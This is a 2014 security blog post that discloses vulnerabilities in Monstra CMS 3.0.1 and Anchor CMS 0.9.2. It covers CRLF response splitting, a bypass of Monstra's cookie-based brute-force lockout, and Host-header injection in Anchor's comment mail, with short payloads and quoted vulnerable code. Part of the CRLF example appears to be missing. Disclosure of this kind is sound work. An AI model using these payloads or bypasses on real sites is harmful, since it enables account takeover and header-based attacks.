Saturday, November 15, 2014

Posted by Paulos Yibelo
No comments | 2:07 AM

Monstra CMS 3.0.1 (current version at the time of writing) and below Vulnerabilities 

HTTP Response Splitting (CRLF Injection)

SetCookie("cryptcookietest", "1");
... ?>

So providing 

Using %0A%0D%0A%0D will allow you to add headers. this can be used to cause 
reflective XSS, Content-Spoofing, Open Redirection, and many more. 

Would result a CRLF injection.

Note: PHP version must allow multiple headers. this is fixed >5.1.2 

Bruteforce Mitigation Bypass [CVE-2014-9006]



// Admin login
if (Request::post('login_submit')) {

    if (Cookie::get('login_attempts') && Cookie::get('login_attempts') >= 5) {

        $login_error = __('You are banned for 10 minutes. Try again
later', 'users');

    } else {

        $user = $users->select("[login='" .
trim(Request::post('login')) . "']", null);

The code blocks bruteforce attempts simply by placing a cookie called 
"login_attempts" in the victims browser an attacker can craft a bruteforce script
that either clears cookies or does not send cookies at all.

Anchor CMS <= 0.9.2 Header Injection [CVE-2014-9182]

Anchor CMS versions 0.9.2 and below suffer from a header injection vulnerability.

Anchor CMS <= 0.9.2 (Current Version)
header injection
in anchor/models/comment.php
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers .= 'From: notifications@' . $_SERVER['HTTP_HOST'] . "\r\n";
49: mail($to, __('comments.notify_subject'), $message, $headers);
 ...  ?>
so it  is possible to inject arbitary "From" headers or any header
using CRLF. simply by tampering and changing the host to or\r\nNew-Header:Hacked!


Post a Comment